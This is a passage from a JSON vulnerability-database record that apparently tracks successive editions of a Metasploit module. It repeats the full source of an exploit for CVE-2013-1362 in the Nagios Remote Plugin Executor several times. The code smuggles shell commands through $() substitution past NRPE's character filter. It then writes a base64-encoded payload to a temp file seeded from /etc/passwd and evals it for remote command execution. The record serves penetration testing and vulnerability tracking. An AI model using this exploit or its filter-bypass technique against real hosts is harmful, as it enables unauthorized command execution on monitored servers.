end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-03-23T11:50:59", "differentElements": ["modified", "published"], "edition": 56}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-03-23T13:51:05", "history": [], "viewCount": 84, "enchantments": {"score": {"value": 3.3, "modified": "2018-03-23T13:51:05", "vector": "AV:N/AC:L/Au:M/C:N/I:N/A:P/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-03-23T13:51:05", "differentElements": ["modified", "published"], "edition": 57}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-03-28T09:55:40", "history": [], "viewCount": 85, "enchantments": {"score": {"value": 3.3, "modified": "2018-03-28T09:55:40", "vector": "AV:N/AC:L/Au:M/C:N/I:N/A:P/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-03-28T09:55:40", "differentElements": ["modified", "published"], "edition": 58}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-03-28T21:54:37", "history": [], "viewCount": 87, "enchantments": {"score": {"value": 3.3, "modified": "2018-03-28T21:54:37", "vector": "AV:N/AC:L/Au:M/C:N/I:N/A:P/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-03-28T21:54:37", "differentElements": ["modified", "published"], "edition": 59}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-03-29T23:57:07", "history": [], "viewCount": 87, "enchantments": {"score": {"value": 3.3, "modified": "2018-03-29T23:57:07", "vector": "AV:N/AC:L/Au:M/C:N/I:N/A:P/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
